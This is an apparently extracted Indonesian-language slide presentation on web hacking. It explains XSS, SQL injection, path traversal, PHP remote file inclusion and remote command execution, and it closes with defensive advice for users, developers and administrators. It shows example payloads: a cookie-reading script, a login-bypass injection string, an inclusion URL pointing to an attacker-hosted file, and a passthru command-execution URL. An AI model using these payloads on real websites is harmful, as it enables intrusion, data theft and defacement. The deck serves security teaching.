Ahmad Muammar W. K.
http://google.com/search?q=y3dips
Details Web Hacking Threat Simulation Impact Discussion
http://google.com/search?q=y3dips
Web Hacking Hacking melalui HTTP [ hacking over http ] Hacking terhadap Web Application Melalui port 80 ; port HTTP Memanfaatkan kelemahan dari web application Web browser attack Bypassing Firewall ? Menggunakan HTTP rules (method)
Get , Put , Post, Options , find , Delete, Trace
http://google.com/search?q=y3dips
Hyper Text Transfer Protocol (HTTP) HTTP terletak pada bagian atas dari gambar “Security level” yaitu APLIKASI
•Apache •IIS •Tomcat •Netscape http request (clear text/ ssl)
User
Http reply (HTML, Javascript, VBscript)
Plugins •Perl •PHP •JSP •E.t.c
Web application Firewall
Web Server •MsSQL •Postgre •Mysql •Oracle
Database Server
Ahmad Muammar W. K.
http://google.com/search?q=y3dips
Client side attack (xss, cookies stealing) Information Disclosure
OS commanding (SQL, SSI, Ldap, Xpath ) Brute Force
Web Hacking
Denial Of Service Path travesal
Remote command execution (php) Etc Sumber: http://www.webappsec.org
Client Side Attack Cross Site Scripting Suatu Jenis Serangan dengan cara memasukkan code/script HTML (javascript) kedalam suatu web site dan dijalankan melalui browser di client Contoh <script>alert(document.cookie)
Mendapatkan Cookies yang berisi info berharga milik client yang digunakan oleh server untuk proses authentikasi
http://google.com/search?q=y3dips
Information Disclosure Predictable resource location Jenis serangan dengan menebak letak resource yang disembunyikan dan umum di gunakan oleh web aplikasi •Contoh : – /admin/ – /backup/ – /logs/ – /PhpMyadmin/ – admin.php – login.php
http://google.com/search?q=y3dips
SQL injection Suatu Cara untuk Mengexploitasi Web Application yang menggunakan suatu database , dan memasukan command sql ,sehingga membentuk suatu query yang akan dieksekusi dan dijalankan oleh sql server. Contoh: http://victim.com/login.asp yang menerima input user dan pass attacking input user = test ‘OR ‘1’=‘1 && input pass =test
Syntax SQL : select * from users where pass=‘test’ and user = ‘test’or’1’=‘1’ Passing the login box !!!
http://google.com/search?q=y3dips
Path Traversal Suatu jenis vulnerabilities yang mengakibatkan user dapat melihat secara lengkap path suatu direktori atau file dari suatu situs/website Contoh : http://target.com/appx/Sources/Admin.php Fatal error: Call to undefined function: is_admin() in /var/www/html/user/target/appx/Sources/Admin.php on line 32 Diketahui bahwa halaman web target.com terletak di /var/www/html/user/target
Kegunaan bagi attacker Mempersingkat waktu untuk mencari letak web direktori target Informasi tambahan jika telah memiliki akses ke server. = ‘pwd’ pada situs target
http://google.com/search?q=y3dips
Ahmad Muammar W. K.
http://google.com/search?q=y3dips
PHP under attack* Remote file inclusion Remote Command execution
*2 jenis serangan terhadap web aplikasi yang berbasis php http://google.com/search?q=y3dips
PHP under attack Remote File inclusion Suatu jenis serangan yang dilakukan dengan meng-include-kan halaman web lain kepada suatu situs/web aplikasi. Contoh Situs yang vulnerable http://victim.com/index.php?file=readme.txt URL code : http://victim.com/index.php?file=http://echo.or.id
http://google.com/search?q=y3dips
victim
http://echo.or.id
PHP under attack
Shot ! Modifikasi “inclusion page”
Change url “http://echo.or.id’ > http://attacker.xxx/in.txt
http://google.com/search?q=y3dips
Real site
PHP under attack
Remote Command Execution Suatu jenis serangan yang dilakukan dengan meng-include-kan tag-tag bahasa pemrograman secara remote dan mengakibatkan web yang “vulnerable” akan mengeksekusi “request” yang di kirimkan. Contoh Situs yang vulnerable http://victim.com/viewtopic.php?t=48 URL code: http://victim.com/viewtopic.php?t=48&highlight=%2527.passthru($HTTP_GET_VARS[a]).%2527 &a=id;pwd
http://google.com/search?q=y3dips
Ahmad Muammar W. K.
http://google.com/search?q=y3dips
Most Impact Defacing Data Stolen Etc
http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
Defacing Kegiatan merubah/merusak tampilan suatu website baik halaman utama (index) ataupun halaman lain yang masih terkait dalam satu url dengan website tersebut (folder lain ; file lain)
http://google.com/search?q=y3dips
Motives Dendam atau perasaan gak puas* Kenikmatan tersendiri, 'defacer' merasa tertantang Intrik politik, Sosial Penyampaian pesan Keuntungan Materill Prestice dalam kelompok
http://google.com/search?q=y3dips
http://google.com/search?q=y3dips
As a User Gunakan Firewall, Antivirus, Anti Trojan, Good Backup Facility dsb Penggunaan Password / pass phrase yang baik Berhati hati terhadap semua tawaran ‘menggiurkan’ (attachment/program) Penggunaan fasilitas secara hati hati (warnet; public internet café) Penggunaan Secure login/Secure connection (https ; ssh) Update Informasi
http://google.com/search?q=y3dips
As a Developer Secure programming Gunakan Input Validation yang baik Gunakan Enkripsi untuk authentikasi dan proses lain yang di anggap perlu Matikan error_log ( kecuali saat development ) Sesuai Kebutuhan dan kemampuan ! Update informasi secara general dan informasi specifik engine yang digunakan
http://google.com/search?q=y3dips
As an Administrator Policy (strict restriction) Setting Optimal (Sesuai kebutuhan) pada environtment ; configurasi server Batasi Fungsi yang bisa berinteraksi dengan system environtment Php (passthru , system, exec) ; msSQL (xp_cmdshell, xp_regdeletekey, xp_msver) Update Patch terbaru untuk application Selalu Update Informasi
http://google.com/search?q=y3dips
Ahmad Muammar W. K.
http://google.com/search?q=y3dips